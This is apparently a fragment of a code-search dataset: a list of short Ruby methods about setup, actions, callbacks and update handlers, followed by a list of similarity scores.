"def setup( *args )\n\t\t\tself.class.setupBlocks.each {|sblock|\n\t\t\t\tdebugMsg \"Calling setup block method #{sblock}\"\n\t\t\t\tself.send( sblock )\n\t\t\t}\n\t\t\tsuper( *args )\n\t\tend",
"def config(action, *args); end",
"def setup\n @setup_proc.call(self) if @setup_proc\n end",
"def before_action \n end",
"def setup_callbacks\n defined_callbacks.each do |meth|\n unless respond_to?(\"call_#{meth}_callbacks\".to_sym)\n self.class.module_eval <<-EOE\n def call_#{meth}_callbacks(*args)\n plugin_store.each {|a| a.call_#{meth}_callbacks(*args) } if respond_to?(:plugin_store) && plugin_store\n self.send :#{meth}, *args if respond_to?(:#{meth})\n end\n EOE\n end\n end\n end",
"def action\n end",
"def matt_custom_action_begin(label); end",
"def setup\n # override this if needed\n end",
"def setup\n\t\t\t\t\t\t# Do nothing\n\t\t\t\tend",
"def setup\n\t\t\t\t\t\t# Do nothing\n\t\t\t\tend",
"def action(options,&callback)\n new_action = Action===options ? options : Action.new(options,&callback)\n # replace any with (shared name/alias or both default) + same arity\n @actions.delete_if do |existing_action|\n ((existing_action.names & new_action.names).size > 0 ||\n existing_action.default? && new_action.default?) &&\n existing_action.required.size == new_action.required.size &&\n existing_action.optional.size <= new_action.optional.size\n end\n @actions = (@actions + [new_action]).sort\n new_action\n end",
"def set_target_and_action target, action\n self.target = target\n self.action = 'sugarcube_handle_action:'\n @sugarcube_action = action\n end",
"def after(action)\n invoke_callbacks *options_for(action).after\n end",
"def pre_task\n end",
"def setup(server)\n server.on('beforeMethod', method(:before_method), 10)\n end",
"def add_actions\n attribute = machine.attribute\n name = self.name\n \n owner_class.class_eval do\n define_method(name) {self.class.state_machines[attribute].events[name].fire(self)}\n define_method(\"#{name}!\") {self.class.state_machines[attribute].events[name].fire!(self)}\n define_method(\"can_#{name}?\") {self.class.state_machines[attribute].events[name].can_fire?(self)}\n end\n end",
"def init_actions\n @select_action = SelectAction.new\n @endpoint_mouse_action = EndpointMouseAction.new\n @move_action = MoveAction.new\n end",
"def setup_signals; end",
"def after_created\r\n return unless compile_time\r\n Array(action).each do |action|\r\n run_action(action)\r\n end\r\nend",
"def after_created\r\n return unless compile_time\r\n Array(action).each do |action|\r\n run_action(action)\r\n end\r\nend",
"def set_target_and_action target, action\n self.target = target\n self.action = 'sugarcube_handle_action:'\n @sugarcube_action = action.respond_to?('weak!') ? action.weak! : action\n end",
"def initialize(*args)\n super\n @action = :set\nend",
"def after_set_callback; end",
"def setup\n #implement in subclass;\n end",
"def lookup_action; end",
"def setup &block\n if block_given?\n @setup = block\n else\n @setup.call\n end\n end",
"def setup_action\n return TSBS.error(@acts[0], 1, @used_sequence) if @acts.size < 2\n actions = TSBS::AnimLoop[@acts[1]]\n if actions.nil?\n show_action_error(@acts[1])\n end\n @sequence_stack.push(@acts[1])\n @used_sequence = @acts[1]\n actions.each do |acts|\n @acts = acts\n execute_sequence\n break if @break_action\n end\n @sequence_stack.pop\n @used_sequence = @sequence_stack[-1]\n end",
"def release_actions; end",
"def around_hooks; end",
"def save_action; end",
"def setup(easy)\n super\n easy.customrequest = @verb\n end",
"def action_target()\n \n end",
"def setup\n callback(:setup) do\n notify(:setup)\n migration_check.last_deployed_commit\n end\n end",
"def setup\n return unless @setup\n\n actions = @setup['setup'].select { |action| action['do'] }.map { |action| Action.new(action['do']) }\n run_actions_and_retry(actions)\n self\n end",
"def before_setup\n # do nothing by default\n end",
"def my_actions(options)\n @setup = false\n get_template_part(\"custom_used\",\"action_users\",true)\n end",
"def default_action; end",
"def setup(&blk)\n @setup_block = blk\n end",
"def callback_phase\n super\n end",
"def advice\n end",
"def _handle_action_missing(*args); end",
"def duas1(action)\n action.call\n action.call\nend",
"def shared_action(name, &block)\n @controller.shared_actions[name] = block\n end",
"def before_action action, &block\n @audience[:before][action] ||= Set.new\n @audience[:before][action] << block\n end",
"def setup_initial_state\n\n state_a = State.new(\"a\", 0)\n state_b = State.new(\"b\", 0)\n state_c = State.new(\"c\", 10)\n\n move_to_b = Action.new(\"move_to_b\", 1, state_b)\n\n move_to_c = Action.new(\"move_to_c\", 1, state_c)\n\n state_a.actions = [move_to_b, move_to_c]\n\n return state_a\n \nend"
] |
[
"0.6163163",
"0.6045976",
"0.5946146",
"0.591683",
"0.5890051",
"0.58349305",
"0.5776858",
"0.5703237",
"0.5703237",
"0.5652805",
"0.5621621",
"0.54210985",
"0.5411113",
"0.5411113",
"0.5411113",
"0.5391541",
"0.53794575",
"0.5357573",
"0.53402257",
"0.53394014",
"0.53321576",
"0.53124547",
"0.529654",
"0.5296262",
"0.52952296",
"0.52600986",
"0.52442724",
"0.52385926",
"0.52385926",
"0.52385926",
"0.52385926",
"0.52385926",
"0.5232394",
"0.523231",
"0.5227454",
"0.52226824",
"0.52201617",
"0.5212327",
"0.52079266",
"0.52050185",
"0.51754695",
"0.51726824",
"0.51710224",
"0.5166172",
"0.5159343",
"0.51578903",
"0.51522785",
"0.5152022",
"0.51518047",
"0.51456624",
"0.51398855",
"0.5133759",
"0.5112076",
"0.5111866",
"0.5111866",
"0.5110294",
"0.5106169",
"0.509231",
"0.50873137",
"0.5081088",
"0.508059",
"0.50677156",
"0.50562143",
"0.5050554",
"0.50474834",
"0.50474834",
"0.5036181",
"0.5026331",
"0.5022976",
"0.5015441",
"0.50121695",
"0.5000944",
"0.5000019",
"0.4996878",
"0.4989888",
"0.4989888",
"0.49864885",
"0.49797225",
"0.49785787",
"0.4976161",
"0.49683493",
"0.4965126",
"0.4958034",
"0.49559742",
"0.4954353",
"0.49535993",
"0.4952725",
"0.49467874",
"0.49423352",
"0.49325448",
"0.49282882",
"0.49269363",
"0.49269104",
"0.49252945",
"0.4923091",
"0.49194667",
"0.49174926",
"0.49173003",
"0.49171105",
"0.4915879",
"0.49155936"
] |
0.0
|
-1
|
Never trust parameters from the scary internet; only allow the whitelist through.
|
def post_params
      params.require(:post).permit(:title, :content, :created_at, :image)
end
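
The permit list only takes effect when records are built or updated through it. A minimal usage sketch, assuming a conventional create action (hypothetical; not part of the record above):

def create
  # Mass assignment goes through the whitelist, so any extra keys in
  # params[:post] (e.g. an injected :admin flag) are dropped.
  @post = Post.new(post_params)

  if @post.save
    redirect_to @post, notice: 'Post was successfully created.'
  else
    render :new, status: :unprocessable_entity
  end
end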
|
{
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
}
|
[
"def strong_params\n params.require(:user).permit(param_whitelist)\n end",
"def strong_params\n params.require(:listing_member).permit(param_whitelist)\n end",
"def allow_params_authentication!; end",
"def allowed_params\n ALLOWED_PARAMS\n end",
"def default_param_whitelist\n [\"mode\"]\n end",
"def param_whitelist\n [:role, :title]\n end",
"def expected_permitted_parameter_names; end",
"def safe_params\n params.except(:host, :port, :protocol).permit!\n end",
"def strong_params\n params.require(:team_member).permit(param_whitelist)\n end",
"def permitir_parametros\n \t\tparams.permit!\n \tend",
"def strong_params\n params.require(:community).permit(param_whitelist)\n end",
"def permitted_strong_parameters\n :all #or an array of parameters, example: [:name, :email]\n end",
"def strong_params\n params.require(:education).permit(param_whitelist)\n end",
"def restricted_params\n #params.require(self.controller_name.classify.underscore.to_sym).permit([])\n raise(\"No strong params set, override restricted_params method in your controller. E.g. params.require(:model).permit(:attribute1, :attribute2)\")\n end",
"def allowed_params\n params.require(:user).permit(:username, :email, :password, :password_confirmation)\n end",
"def param_whitelist\n [:rating, :review]\n end",
"def param_whitelist\n whitelist = [\n :username, :name,\n :parent_id,\n :headline, :description, :video,\n :policy, :signup_mode, :category,\n :website, :facebook, :twitter, :linkedin,\n :founded_at,\n privacy: [\n :events,\n :resources\n ],\n permission: [\n :profile,\n :members,\n :children,\n :statistics,\n :posts,\n :listings,\n :resources,\n :events\n ],\n location: [\n :description,\n :street,\n :city,\n :state,\n :zip,\n :country,\n :latitude,\n :longitude\n ]\n ]\n \n if action_name === 'update'\n whitelist.delete(:parent_id)\n unless current_user.role_in(@community) === 'owner'\n whitelist.delete(:privacy)\n whitelist.delete(:permission)\n end\n end\n \n whitelist\n end",
"def param_whitelist\n if @user.present? && current_user != @user\n return [:followed]\n end\n \n whitelist = [\n :username, :email, :password,\n :first_name, :last_name,\n :birthday, :gender,\n :headline, :biography, :ask_about, :focus,\n :website, :facebook, :linkedin, :twitter, :github,\n roles: [],\n skills: [],\n interests: [],\n privacy: { contact: [] },\n location: [\n :description,\n :street,\n :city,\n :state,\n :zip,\n :country,\n :latitude,\n :longitude\n ]\n ]\n \n if action_name === 'update'\n whitelist.delete(:email)\n whitelist.delete(:password)\n end\n \n whitelist\n end",
"def user_params \n \tparams.require(:user).permit(:name, :email, :password, :password_confirmation)# preventing CSTR\n end",
"def user_params\n params.permit(:name, :phoneNumber, :address, :postalCode, :local, :link, :counter, :latitude, :longitude) \n end",
"def valid_params_request?; end",
"def strong_params\n params.require(:experience).permit(param_whitelist)\n end",
"def trim_whitelisted(params, whitelist)\n # remove any parameters that are not whitelisted\n params.each do |key, value|\n # if white listed\n if whitelist.include? key\n # strip the parameters of any extra spaces, save as string\n params[key] = value.to_s.strip\n else\n # delete any unauthorized parameters\n params.delete key\n end\n end\n params\n end",
"def whitelist_url_params\n params.require(:whitelist_url).permit(:domain)\n end",
"def allowed_params\n params.require(:allowed).permit(:email)\n end",
"def permitted_params\n []\n end",
"def trim_whitelisted(params, whitelist)\n # remove any parameters that are not whitelisted\n params.each do |key, value|\n # if white listed\n if whitelist.include? key\n # strip the parameters of any extra spaces, save as string\n params[key] = value.to_s.strip\n else\n # delete any unauthorized parameters\n params.delete key\n end\n end\n params\n end",
"def safe_params\n params.permit(:id, :name, :origin, :emails => []); #emails is an array\n end",
"def query_param\n\t\tparams.permit(:first_name, :last_name, :phone)\n\tend",
"def strong_params\n params.require(:success_metric).permit(param_whitelist)\n end",
"def devise_filter\r\n logger.debug(\"In devise_filter =>PARAMS: #{params.inspect}\")\r\n\r\n # White list for sign_up\r\n devise_parameter_sanitizer.for(:sign_up) { |u| u.permit(user_whitelist) }\r\n\r\n # White list for account update\r\n devise_parameter_sanitizer.for(:account_update) { |u| u.permit(user_whitelist, :current_password) }\r\n\r\n # White list for Invitation creation\r\n devise_parameter_sanitizer.for(:invite) { |u| u.permit(:account_type, :email, :invitation_token)}\r\n\r\n # White list for accept invitation\r\n devise_parameter_sanitizer.for(:accept_invitation) { |u| u.permit(user_whitelist, :invitation_token)}\r\n\r\n end",
"def whitelisted_user_params\n params.require(:user).\n permit( :first_name, :last_name, :email,:password,:password_confirmation,:birthday,:gender)\n end",
"def user_params\n ActionController::Parameters.permit_all_parameters = true\n params.require(:user) #.permit(:name, :surname, :phone, :password, :email, :time_zone)\n end",
"def strong_params\n params.require(:metric_change).permit(param_whitelist)\n end",
"def safe_params\n params.require(:user).permit(:name)\n end",
"def get_params\n\t\treturn ActionController::Parameters.new(self.attributes).permit(\"account_id\", \"title\", \"category\", \"introduction\", \"tags\", \"segment_type\", \"visible\", \"status\", \"main_image\")\n\tend",
"def grant_params\n @whitelisted = params.require(:grant).permit(:name, :description, :agency_id, :acronym)\n end",
"def check_params; true; end",
"def param_whitelist\n whitelist = [\n :description,\n :progress,\n :kpi_id\n ]\n \n unless action_name === 'create'\n whitelist.delete(:kpi_id)\n end\n \n whitelist\n end",
"def quote_params\n params.permit!\n end",
"def valid_params?; end",
"def paramunold_params\n params.require(:paramunold).permit!\n end",
"def user_params\n\t\tparams.permit(:nickname, :avatar, :description, :password, :gender, :birthday, :email, :phone, :qq_id, :wechat_id)\n\tend",
"def filtered_parameters; end",
"def user_params\n params.permit(\n \t:id,\n \t:email, \n \t:first_name, \n \t:last_name, \n \t:password, \n \t:confirm_token, \n \t:phone_number,\n \t:facebook_link,\n \t:car_model,\n \t:license_plate)\n end",
"def filtering_params\n params.permit(:email, :name)\n end",
"def check_params\n true\n end",
"def wx_public_params\n params.require(:wx_public).permit(:nickname, :manager, :alias)\n end",
"def allowed_params\n params.require(:user).permit(:email, :password, :role, :first_name, :last_name, :password_confirmation)\n end",
"def allowed_params\n params.require(:user).permit(:email, :password, :role, :first_name, :last_name, :password_confirmation)\n end",
"def listing_params\n\t\tparams.permit(:address, :transit_info, :rules, :other_info, :lat, :lng)\n\tend",
"def social_account_params\n\t\t\tparams.require(:social_account).permit!\n\t\tend",
"def safe_params\n resurce_name = self.class.resource_name\n params_method_name = \"#{resurce_name}_params\".to_sym\n if params[resurce_name]\n if respond_to?(params_method_name) || private_methods.include?(params_method_name)\n send(params_method_name)\n else\n raise ActiveModel::ForbiddenAttributesError, \"Please, define the '#{params_method_name}' method in #{self.class.name}\"\n end\n end\n end",
"def url_params\n params.require(:url).permit(:short_url, :original_url, :clicks, :ip_addresses)\n end",
"def user_params\n params.require(:user).permit(:uri, :username, :password, :realname, :email, :publicvisible)\n end",
"def model_params\n\t\tparams.require(:manager).permit(\n\t :user_name,\n :password,\n :email,\n \t\t\t)\n\tend",
"def article_params_whitelist\n params.require(:article).permit(:title, :description, category_ids: [])\n end",
"def college_whitelist_params\n params.require(:college_whitelist).permit(:status)\n end",
"def active_code_params\n params[:active_code].permit\n end",
"def filtering_params\n params.permit(:email)\n end",
"def valid_params(params)\n params.permit(:user_id, :photo_id, :originX, :originY, :width, :height)\n end",
"def ip_address_params\n\t\t\tparams.require(:ip_address).permit!\n end",
"def pull_request_params\n whitelist = [\n :url,\n :id,\n :html_url,\n :diff_url,\n :patch_url,\n :issue_url,\n :number,\n :state,\n :locked,\n :title\n ]\n params.require(:pull_request).permit(whitelist)\n end",
"def reserved_params\n params.require(:reserved).permit(:name, :email, :pax, :address, :KTP, :title)\n end",
"def post_params\n if current_user.admin? \n params.permit(:title, :body, :city, :country, :gps_location, :privacy, :visible, :latitude, :longitude, images: [], files: [])\n else \n params.permit(:title, :body, :city, :country, :gps_location, :privacy,:latitude, :longitude, images: [], files: [])\n end \n end",
"def list_params\n params.permit(:name)\n end",
"def filter_parameters; end",
"def filter_parameters; end",
"def vineyard_params\n params.permit(:vineyard_name, :email, :website_url, :phone, :address, :city, :region, :postcode, :country, :specialty, :description, :pet_friendly, :holiday, :tours, :events, :family_friendly, :cover_image, :image_one, :image_two, :image_three, :image_four, :user_id, :base64)\n end",
"def available_activity_params\n # params.require(:available_activity).permit(:type,:geometry,:properties)\n whitelisted = ActionController::Parameters.new({\n type: params.require(:available_activity)[:type],\n geometry: params.require(:available_activity)[:geometry].try(:permit!).to_h,\n properties: params.require(:available_activity)[:properties].try(:permit!).to_h\n }).try(:permit!)\n end",
"def user_params\n params.permit(:name, :username, :email, :password, :img_url, :bg_url, :coinbank)\n end",
"def user_params_pub\n\t \tparams[:user].permit(:hruid)\n\t end",
"def user_params\n params.permit(:id, :email, :password, :nickname, :status, :avatar, :flat_picture, :flatsharing_id, :member,\n :user, :color, :solde)\n end",
"def validate_search_inputs\n @whitelisted = params.fetch(:user, nil)\n if @whitelisted.blank?\n render_error(400, \"#{I18n.t('general_error.params_missing_key')}\": [I18n.t('general_error.params_missing_value', model: \"review\")])\n return\n else\n @whitelisted = @whitelisted.permit(:name, :uen, :description)\n end\n end",
"def param_whitelist\n [\n :title,\n :description,\n :organization,\n :team_id,\n :started_at,\n :finished_at,\n location: [\n :description,\n :street,\n :city,\n :state,\n :zip,\n :country,\n :latitude,\n :longitude\n ]\n ]\n end",
"def url_whitelist; end",
"def admin_social_network_params\n params.require(:social_network).permit!\n end",
"def filter_params\n params.require(:filters).permit(:letters)\n end",
"def origin_params\n params.permit(:country, :state, :city, :postal_code, :address, :description)\n end",
"def valid_params(params)\n params.permit(:login, :first_name, :last_name, \n :password, :password_confirmation)\n end",
"def sensitive_params=(params)\n @sensitive_params = params\n end",
"def permit_request_params\n params.permit(:address)\n end",
"def user_params\n # Ensure a user can't give themselves admin priveleges\n params.delete(:admin) if current_user.admin?\n params.require(:user).permit(:name, :email, :admin, :image)\n end",
"def secure_params\n params.require(:location).permit(:name)\n end",
"def strong_params\n params.require( :setting ).\n permit( :global_scan_limit, :per_user_scan_limit,\n :target_whitelist_patterns, :target_blacklist_patterns )\n end",
"def question_params\n params.require(:survey_question).permit(question_whitelist)\n end",
"def case_insensitive_params\n params.require(:case_insensitive).permit(:name)\n end",
"def empire_master_no_match_params\n params.require(:empire_master_no_match).permit(:uid, :last_name, :list, :search_date, :double, :source)\n end",
"def maintenance_request_params\n params[:maintenance_request].permit! #allow all parameters for now\n end",
"def unwanted_params\n params.require(:unwanted).permit(:title, :description, :image)\n end",
"def url_params\n params[:url].permit(:full)\n end",
"def backend_user_params\n params.permit!\n end",
"def filter_params\n\t\treturn params[:candidate].permit(:name_for_filter)\n\tend",
"def speed_measurement_params\n\n #fuckit, to lazy to deal with permit crap right now\n ActionController::Parameters.permit_all_parameters = true\n\n params[:speed_measurement]\n end",
"def user_params\n params.permit(:name, :age, :username, :display_photo, :password)\n end",
"def get_params\r\n #params.require(:article).permit(:title, :permalink, :content, :source_site, :introtext, :type_id, :order_by, :searchable, :created_by, :edited_by, :published_by, :published_on, :user_id)\r\n params.require(:article).permit!\r\n\r\n end",
"def pub_params\n params.require(:pub).permit(:name, :description, :phone, :email, :hidden, :city_id, :address)\n end",
"def pass_params\n params[:pass].permit(:name, :price, :description, :colour, :events)\n end",
"def droptraining_params\n params.permit(:training_id,:user_id, :utf8, :authenticity_token, :commit)\n end",
"def person_params\n # params whitelist does *not* include admin, sub, remember_token\n # TBD: share this whitelist with the list used by configuration_permitted_parameters\n # TBD: should current_password be on this list? -- for now, leaving off, since it seems to work without\n # NOTE: do not include 'admin' in this list!\n params.require(:person).permit(\n :name, \n :email, \n :description,\n :password, \n :password_confirmation\n )\n end",
"def parameter_params\n params.require(:parameter).permit(:name, :description, :param_code, :param_value, :active_from, :active_to)\n end"
] |
[
"0.69792545",
"0.6781151",
"0.67419964",
"0.674013",
"0.6734356",
"0.6591046",
"0.6502396",
"0.6496313",
"0.6480641",
"0.6477825",
"0.64565",
"0.6438387",
"0.63791263",
"0.63740575",
"0.6364131",
"0.63192815",
"0.62991166",
"0.62978333",
"0.6292148",
"0.6290449",
"0.6290076",
"0.62894756",
"0.6283177",
"0.6242471",
"0.62382483",
"0.6217549",
"0.6214457",
"0.6209053",
"0.6193042",
"0.6177802",
"0.6174604",
"0.61714715",
"0.6161512",
"0.6151757",
"0.6150663",
"0.61461",
"0.61213595",
"0.611406",
"0.6106206",
"0.6105114",
"0.6089039",
"0.6081015",
"0.6071004",
"0.60620916",
"0.6019971",
"0.601788",
"0.6011056",
"0.6010898",
"0.6005122",
"0.6005122",
"0.6001556",
"0.6001049",
"0.59943926",
"0.5992201",
"0.59909594",
"0.5990628",
"0.5980841",
"0.59669393",
"0.59589154",
"0.5958826",
"0.5957911",
"0.5957385",
"0.5953072",
"0.59526145",
"0.5943361",
"0.59386164",
"0.59375334",
"0.59375334",
"0.5933856",
"0.59292704",
"0.59254247",
"0.5924164",
"0.59167904",
"0.59088355",
"0.5907542",
"0.59064597",
"0.5906243",
"0.5898226",
"0.589687",
"0.5896091",
"0.5894501",
"0.5894289",
"0.5891739",
"0.58860534",
"0.5882406",
"0.587974",
"0.58738774",
"0.5869024",
"0.58679986",
"0.5867561",
"0.5865932",
"0.5864461",
"0.58639693",
"0.58617616",
"0.5861436",
"0.5860451",
"0.58602303",
"0.5854586",
"0.58537364",
"0.5850427",
"0.5850199"
] |
0.0
|
-1
|
For an update message, we update the plate in Sequencescape, setting the updated aliquots.
|
def _call_in_transaction
  begin
    update_aliquots(s2_resource)
  rescue Sequel::Rollback, PlateNotFoundInSequencescape, UnknownSample => e
    # The plate cannot be updated: requeue the message for a retry and
    # abort the enclosing transaction.
    metadata.reject(:requeue => true)
    log.info("Error updating plate aliquots in Sequencescape: #{e}")
    raise Sequel::Rollback
  rescue TransferRequestNotFound => e
    # Non-fatal: acknowledge the message but record the missing transfer
    # request as a warning.
    metadata.ack
    log.info("Plate update message processed and acknowledged with the warning: #{e}")
  else
    # Success: acknowledge the message so the broker does not redeliver it.
    metadata.ack
    log.info("Plate update message processed and acknowledged")
  end
end
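
A minimal sketch of how a handler like this sits inside a Sequel transaction, assuming hypothetical DB and handler stand-ins (names here are assumptions, not the project's real objects): raising Sequel::Rollback inside a transaction block makes Sequel abort the transaction without re-raising, so a rejected/requeued message does not crash the consumer loop.

require 'sequel'

DB = Sequel.sqlite  # in-memory database, purely for illustration

# Hypothetical wrapper around the handler above; `handler` is assumed
# to respond to _call_in_transaction as in the document field.
def process(handler)
  DB.transaction do
    handler._call_in_transaction
    # If the handler raised Sequel::Rollback, Sequel swallows it here
    # and rolls the transaction back; control returns normally.
  end
end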
|
{
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
}
|
[
"def update_aliquots_in_sequencescape(plate, plate_uuid, date, sample_uuids)\n plate_id = plate_id_by_uuid(plate_uuid)\n\n # wells is a hash associating a location to a well id\n wells = location_wells(plate_id) \n\n # We save the plate wells data from the transfer\n plate.keys.each do |location|\n receptacle_id = wells[location]\n\n # Save aliquots\n if sample_uuids.has_key?(location)\n sample_uuids[location].each do |sample_uuid|\n sample_resource_uuid = db[:uuids].select(:resource_id).where(\n :resource_type => settings[\"sample_type\"],\n :external_id => sample_uuid\n ).first\n\n raise UnknownSample, \"The sample #{sample_uuid} cannot be found in Sequencescape\" unless sample_resource_uuid\n sample_id = sample_resource_uuid[:resource_id]\n tag_id = get_tag_id(sample_id)\n study_id = study_id(sample_id)\n\n aliquot = db[:aliquots].where({\n :receptacle_id => receptacle_id, \n :sample_id => sample_id, \n :tag_id => tag_id\n }).first \n\n # The aliquot is added only if it doesn't exist yet\n unless aliquot\n create_asset_request!(receptacle_id, study_id, date) \n\n db[:aliquots].insert(\n :receptacle_id => receptacle_id,\n :sample_id => sample_id,\n :study_id => study_id,\n :created_at => date,\n :updated_at => date,\n :tag_id => tag_id\n )\n end\n end\n\n # Update or create well_attribute with volume and concentration information\n plate_solvent = plate[location].find { |aliquot| aliquot.type == \"solvent\" }\n plate_aliquot = plate[location].find { |aliquot| aliquot.type != \"solvent\" } \n volume = plate_solvent.quantity if plate_solvent\n concentration = plate_aliquot.out_of_bounds[settings[\"out_of_bounds_concentration_key\"]] if plate_aliquot\n set_well_volume_and_concentration(receptacle_id, volume, concentration, date) if volume || concentration\n\n # If we have a value for the concentration, it means we had received a working\n # dilution plate. We need then to update the concentration of the stock plate' wells\n # involved in the transfer to the working dilution plate.\n if concentration\n transfer_request = db[:requests].where({\n :target_asset_id => receptacle_id,\n :state => settings[\"transfer_request_state\"],\n :request_type_id => settings[\"transfer_request_type_id\"],\n :sti_type => settings[\"transfer_request_sti_type\"]\n }).first\n\n raise TransferRequestNotFound, \"The transfer request cannot be found in 'requests' table for the target_asset_id: #{receptacle_id}.\" unless transfer_request \n source_well_id = transfer_request[:asset_id]\n\n source_concentration = concentration * settings[\"stock_plate_concentration_multiplier\"]\n set_well_volume_and_concentration(source_well_id, nil, source_concentration, date)\n end\n end\n end\n end",
"def update_origin_plates\n # operations that have not yet errored are guarenteed to correspond to correct colonies on the original plates.\n # we will update the associations of the origin plate for each op to reflect this new verified colony\n operations.running.select { |op| op.input(\"PCR\").sample_type.name != 'Plasmid' }.each do |op|\n # Use association map to cleanly deal with data associated to parts of a collection\n colony_pick = op.input(\"PCR\").part.get(:colony_pick).to_i\n origin_plate_id = op.input(\"PCR\").part.get(:origin_plate_id).to_i\n \n if origin_plate_id && Item.exists?(origin_plate_id) && colony_pick\n origin_plate = Item.find(origin_plate_id)\n correct_colonies = origin_plate.get(:correct_colonies) ? origin_plate.get(:correct_colonies) : []\n \n # rely on idempotence of .to_s to normalize correct \n # colony association into an array regardless\n # of whether it started in array or string format.\n correct_colonies.to_s.chomp(']').chomp!('[') #convert Array to string representation if Array and remove brackets (if string: stays the same)\n correct_colonies = correct_colonies.split(\",\") #string array back to array\n \n correct_colonies.push \"c#{colony_pick}\"\n origin_plate.associate(:correct_colonies, correct_colonies)\n end\n end\n end",
"def update_item_data (info)\n operations.each do |op|\n plate = op.input(\"Plate\").item\n if info[\"n#{plate.id}\".to_sym] == 0\n plate.mark_as_deleted\n plate.save\n op.temporary[:delete] = true\n op.error :no_colonies, \"There are no colonies for plate #{plate.id}\"\n else\n plate.associate :num_colonies, info[\"n#{plate.id}\".to_sym]\n plate.associate :status, info[\"s#{plate.id}\".to_sym]\n \n \n checked_ot = ObjectType.find_by_name(\"Checked E coli Plate of Plasmid\")\n plate.store if plate.object_type_id != checked_ot.id\n plate.object_type_id = checked_ot.id\n plate.save\n op.output(\"Plate\").set item: plate\n \n op.plan.associate \"plate_#{op.input(\"Plate\").sample.id}\", plate.id\n end\n end\n end",
"def update() end",
"def update\n # update_move\n # update_tone_change\n update_rotate\n end",
"def update_plate_purpose_in_sequencescape(plate_uuid, date, plate_purpose_id)\n plate_id = plate_id_by_uuid(plate_uuid)\n db[:assets].where(:id => plate_id).update(\n :plate_purpose_id => plate_purpose_id,\n :updated_at => date\n ) \n end",
"def update ; end",
"def update!(**args)\n @plate_support = args[:plate_support] if args.key?(:plate_support)\n end",
"def update!(**args)\n @info = args[:info] if args.key?(:info)\n @phrase = args[:phrase] if args.key?(:phrase)\n end",
"def update!(**args)\n @changed_text = args[:changed_text] if args.key?(:changed_text)\n @provenance = args[:provenance] if args.key?(:provenance)\n @text_anchor = args[:text_anchor] if args.key?(:text_anchor)\n end",
"def update!(**args)\n @deskew_angle = args[:deskew_angle] if args.key?(:deskew_angle)\n @mirrored = args[:mirrored] if args.key?(:mirrored)\n @orientation = args[:orientation] if args.key?(:orientation)\n @textline_order = args[:textline_order] if args.key?(:textline_order)\n @writing_direction = args[:writing_direction] if args.key?(:writing_direction)\n end",
"def update; end",
"def update; end",
"def update; end",
"def update; end",
"def update; end",
"def update; end",
"def update; end",
"def update; end",
"def update!(**args)\n @box = args[:box] if args.key?(:box)\n @code = args[:code] if args.key?(:code)\n @label = args[:label] if args.key?(:label)\n @rotated_box = args[:rotated_box] if args.key?(:rotated_box)\n @symbolvariant = args[:symbolvariant] if args.key?(:symbolvariant)\n end",
"def update\n respond_to do |format|\n if @primer.update(primer_params)\n format.html { redirect_to @sequence, notice: 'Primer was successfully updated.' }\n format.json { render :show, status: :ok, location: @sequence }\n else\n format.html { render :edit }\n format.json { render json: @sequence.errors, status: :unprocessable_entity }\n end\n end\n @primer.refine\n @primer.calculate_tm\n @primer.fill_sequence_name\n @primer.calculate_length\n end",
"def update!(**args)\n @e164 = args[:e164] if args.key?(:e164)\n @i18n_data = args[:i18n_data] if args.key?(:i18n_data)\n end",
"def update!(**args)\n @e164 = args[:e164] if args.key?(:e164)\n @i18n_data = args[:i18n_data] if args.key?(:i18n_data)\n end",
"def update\n \n end",
"def update!(**args)\n @is_isolated = args[:is_isolated] if args.key?(:is_isolated)\n @soft_modifier_collection = args[:soft_modifier_collection] if args.key?(:soft_modifier_collection)\n @text_is_generated = args[:text_is_generated] if args.key?(:text_is_generated)\n end",
"def update!(**args)\n @alignment = args[:alignment] if args.key?(:alignment)\n @width = args[:width] if args.key?(:width)\n end",
"def _call_in_transaction\n aliquot_updater = UpdateAliquotsHandler.new(db, bus, log, metadata, s2_resource, settings)\n\n begin \n s2_resource[:plates].each do |plate|\n aliquot_updater.send(:update_aliquots, plate) if plate[:plate].size == SupportedPlateSize\n end\n\n db.transaction(:savepoint => true) do\n begin\n date = s2_resource[:plates].first[:date]\n add_asset_links(s2_resource[:transfer_map], date)\n set_transfer_requests(s2_resource[:transfer_map], date)\n rescue PlateNotFoundInSequencescape => e\n log.info(\"The asset_link and the transfer request has not been set: #{e.message}\")\n end\n end\n rescue Sequel::Rollback, PlateNotFoundInSequencescape, UnknownSample => e\n metadata.reject(:requeue => true)\n log.info(\"Error updating plate aliquots in Sequencescape: #{e}\")\n raise Sequel::Rollback\n else\n metadata.ack\n log.info(\"Plate transfer message processed and acknowledged\")\n end\n end",
"def update!(**args)\n @asr_caption = args[:asr_caption] if args.key?(:asr_caption)\n @saft_document = args[:saft_document] if args.key?(:saft_document)\n end",
"def update_in_saas\n\n return success unless @is_sync_in_saas_needed\n\n SaasApi::OnBoarding::EditBt.new.perform(\n name: @client_token[:name],\n symbol: @client_token[:symbol],\n conversion_factor: @conversion_factor,\n client_id: @client_token[:client_id]\n )\n\n end",
"def update\r\n # write some gangsta code here\r\n end",
"def update!(**args)\n @active_ingredients = args[:active_ingredients] if args.key?(:active_ingredients)\n @alcohol_by_volume = args[:alcohol_by_volume] if args.key?(:alcohol_by_volume)\n @allergens = args[:allergens] if args.key?(:allergens)\n @derived_nutrition_claim = args[:derived_nutrition_claim] if args.key?(:derived_nutrition_claim)\n @directions = args[:directions] if args.key?(:directions)\n @indications = args[:indications] if args.key?(:indications)\n @ingredients = args[:ingredients] if args.key?(:ingredients)\n @nutrition_claim = args[:nutrition_claim] if args.key?(:nutrition_claim)\n @storage_instructions = args[:storage_instructions] if args.key?(:storage_instructions)\n end",
"def update!(**args)\n @message = args[:message] if args.key?(:message)\n @release = args[:release] if args.key?(:release)\n end",
"def update\n \t\n end",
"def update\n \t\n end",
"def update update\n case update.type.to_sym\n when :update_snakes\n snakes = update.msg \n if @client\n begin\n stonedSnakes = snakes.map { |s| {\"name\" => s.get_name, \"tail\" => s.get_tail.to_json} }\n stoneColdKilledSnakes = JSON.dump(stonedSnakes)\n msg = Message.new(\"update_snakes\", stoneColdKilledSnakes)\n @client.puts(JSON.dump(msg))\n rescue Exception => myException\n @log.info \"Exception rescued: #{myException}\"\n @client = nil\n @isBot = true\n end \n end\n when :update_colors\n if @client\n @client.puts(JSON.dump(update))\n end\n when :identity\n if @client\n# @client.puts(JSON.dump(update));\n end\n end\n end",
